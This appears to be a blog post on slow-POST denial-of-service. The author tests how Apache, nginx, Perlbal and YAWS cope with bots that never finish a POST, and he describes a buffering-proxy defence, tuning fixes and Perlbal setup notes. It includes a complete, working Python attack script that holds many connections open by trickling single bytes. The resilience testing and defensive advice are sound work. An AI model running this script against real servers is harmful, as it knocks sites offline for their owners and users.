Phillip Pearson - web + electronics notes

tech notes and web hackery from a new zealander who was vaguely useful on the web back in 2002 (see: python community server, the blogging ecosystem, the new zealand coffee review, the internet topic exchange).


How other people can kill your web server: no fun and little profit :(

This is probably old news to anyone who's run anything spammable on the web for long enough, but there are bots out there that don't do HTTP particularly well. I had this problem with the Topic Exchange years ago and it just recently hit a couple of BBM's sites. It's now fixed (for some definition of "fixed") in both cases with a Python proxy I wrote to buffer uploads and responses.
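The core trick in a buffering proxy is simple: slurp the entire request into memory before opening a backend connection, so a trickling client ties up only a buffer rather than a backend worker. Here's a minimal sketch of that one piece (the function name, the 10 MB cap and the error handling are my own choices, not taken from the actual proxy):

```python
import socket

def read_full_request(client, max_size=10 * 1024 * 1024):
    """Read a complete HTTP request (headers + body) from a client socket.

    Nothing touches the backend until this returns, so a client trickling
    one byte at a time costs us a buffer, not a backend worker.
    """
    data = b""
    while b"\r\n\r\n" not in data:           # wait for end of headers
        chunk = client.recv(4096)
        if not chunk:
            raise ConnectionError("client closed before finishing headers")
        data += chunk
        if len(data) > max_size:
            raise ValueError("headers too large")
    head, _, body = data.partition(b"\r\n\r\n")
    # find Content-Length so we know how much body is still owed
    length = 0
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            length = int(value)
    while len(body) < length:                # keep reading until the body is complete
        chunk = client.recv(4096)
        if not chunk:
            raise ConnectionError("client closed mid-body")
        body += chunk
        if len(head) + len(body) > max_size:
            raise ValueError("request too large")
    return head + b"\r\n\r\n" + body
```

Only once this returns would the proxy connect to the backend and replay the buffered request.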

Curious as to whether other "standard solutions" out there handle this situation, and also so I could test out my proxy, I wrote a script that makes many HTTP connections to a site, writes POST headers with a large Content-Length, then feeds a byte into each of them every now and then so they don't time out, but never actually finishes the POST.
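The script isn't anything fancy. A cut-down sketch of the idea (the host, connection count and interval are placeholders, and this is not the exact script):

```python
import socket
import time

TARGET = ("localhost", 80)   # placeholder: point this at your own test box
NUM_CONNECTIONS = 200
TRICKLE_INTERVAL = 10        # seconds between single-byte writes

def build_headers(host, path="/", content_length=10000000):
    """POST headers that promise a huge body which will never arrive."""
    return ("POST %s HTTP/1.1\r\n"
            "Host: %s\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            "Content-Length: %d\r\n"
            "\r\n" % (path, host, content_length))

def run():
    # open lots of connections and send only the headers on each
    conns = []
    for _ in range(NUM_CONNECTIONS):
        s = socket.create_connection(TARGET)
        s.sendall(build_headers(TARGET[0]).encode())
        conns.append(s)
    # trickle a byte into each so the server never times us out
    while True:
        time.sleep(TRICKLE_INTERVAL)
        for s in conns:
            s.sendall(b"x")
```

Call run() only against a box you own; each connection pins a server slot indefinitely.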

It took down my development box within seconds, driving it so badly out of memory that the Linux OOM killer kicked in and tore the thing to shreds. Reducing MaxClients in the Apache config improved the situation to the point where the machine would stay up, but the script would still make the site inaccessible (and fill up the accept queue, so nobody would be able to get in even if a request ever did get fully posted). Apache stops accepting requests when it runs out of children, so after a while the script just started getting its connections rejected. Killing the script (and closing all the sockets) made the site instantly accessible again.
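For reference, this is the sort of tuning involved, assuming the prefork MPM (the numbers here are illustrative, not recommendations):

```apache
# Fewer children means less memory consumed by stuck requests, but the
# attack still only needs MaxClients connections to fill every slot.
<IfModule mpm_prefork_module>
    StartServers       5
    MaxClients        50
    ListenBacklog    128
</IfModule>
```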

Trying it out with my proxy in front, I ran it for a few minutes but killed it after it established lots of HTTP connections without affecting the site. My proxy's not particularly clever so you could cause the machine to run out of swap by feeding it gigabytes of data, but it seems fine with lots of connections, at least.

Testing it on a Rails site running on a Mongrel cluster behind nginx gave similar results: no memory exhaustion (as no child processes are spawned with Mongrel/nginx) but an inaccessible site. Interestingly, the site didn't come back for a few minutes after killing the script; nginx or Mongrel took a while to process all the disconnects, or something. Correction: nginx handled the attack flawlessly. I didn't realise, but in the first test there was actually a different proxy in front of nginx, which wasn't so well behaved. So Rails hackers running nginx+mongrel_cluster can rest easy; your sites are probably not susceptible to this!

One bit of software I thought would be able to take a beating without batting an eyelash is Perlbal. And it did... to a point. It seems to use quite a lot of memory per connection, and after 500 connections (at which point it was using something like 3G of virtual memory) it printed "Out of memory!" and died. This is kind of scary, as Perlbal doesn't auto-respawn by itself (at least with the provided debian/perlbal.init script). So if you're running Perlbal you might want to run it under something like supervise or monit, or just in a simple shell script like this:


while true; do
  # run in the foreground so the loop can respawn it when it dies
  /usr/local/bin/perlbal
  sleep 1
done
I've pinged the Perlbal dev list about this. I'm sure it would be possible to get it to stop accept()ing in low-memory situations, or perhaps to limit the number of simultaneous connections per IP -- or, if this is a bug, to fix it.

If anyone has a service running behind a different proxy/balancer that they wouldn't mind me running the script against, please drop me a line. Or for that matter if anyone has a web service that they're concerned is easily taken down, let me know... I'd be interested to see how resilient other proxies and web servers are.

Update: Thanks to Bruce Fitzsimons for letting me take down his Erlang server! New result: a fairly small web server (256M RAM, single CPU) running YAWS accepted about a thousand sockets, then died completely, as Perlbal did. The error was EMFILE: too many open files. The experiment will continue after Bruce does some tweaking :)

Update 2: Bruce upped his ulimit, and I have since been unable to bring his server down. So chalk this up as a success for YAWS, with appropriate configuration. (Details: it handles 3000 simultaneous connections quite happily. Appears to be forcibly closing old connections after getting > 1000 from one IP address - or this may be a bug in my code. More results later!)
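The fix is the standard one, sketched here as an init-script fragment (the 16384 figure is arbitrary):

```shell
# Raise the per-process open-file limit before starting the server; the
# common default of 1024 fds is what produces EMFILE at around a thousand
# simultaneous sockets.
ulimit -n 16384 2>/dev/null || echo "couldn't raise fd limit (need root or a higher hard limit)"
echo "fd limit is now $(ulimit -n)"
```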

Update 3, 2008-01-04: Summary of results so far:

Apache - blocked up immediately

Squid + Apache - blocked up immediately

nginx + Mongrel - happily accepts lots of connections without service interruption

Perlbal - happily accepts lots of connections, but dies eventually due to a bug?

YAWS (Erlang) - happily accepts lots of connections without service interruption

So the safest thing to do if you're running Apache is to throw nginx in front of it. Personally I'm waiting for a Perlbal patch, then I'm going to use it, as it has some cool features and looks very debuggable.


Perlbal notes

Happy New Year! I came across some alarming results last night when testing out a script that simulates badly behaved spambots and am curious as to whether popular load balancers take care of the situation. (I ended up solving the issue in this case by using a reverse proxy I wrote myself a few years ago, but I'm sure someone else has done the same...)

First on the list to try is Perlbal.

Latest Debian install instructions:

sudo apt-get install subversion libbsd-resource-perl libcompress-zlib-perl libnet-netmask-perl libio-stringy-perl libwww-perl libdanga-socket-perl libdbi-perl

svn co

cd Perlbal-1.60

perl Makefile.PL

sudo make install

Debian has a libio-aio-perl package, but it doesn't seem to work for me at the moment (it may only be in unstable) so I installed it from CPAN:

sudo perl -MCPAN -e shell

install IO::AIO

Now you can run Perlbal like this:

perlbal --config=&lt;config filename&gt;
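And here's a minimal reverse-proxy config to get started with. This assumes a backend on 127.0.0.1:8080; `buffer_uploads` is the option relevant to the slow-upload problem described above, but verify the exact option names against the Perlbal docs for your version:

```
CREATE POOL backends
  POOL backends ADD 127.0.0.1:8080

CREATE SERVICE balancer
  SET listen         = 0.0.0.0:80
  SET role           = reverse_proxy
  SET pool           = backends
  SET buffer_uploads = on
ENABLE balancer
```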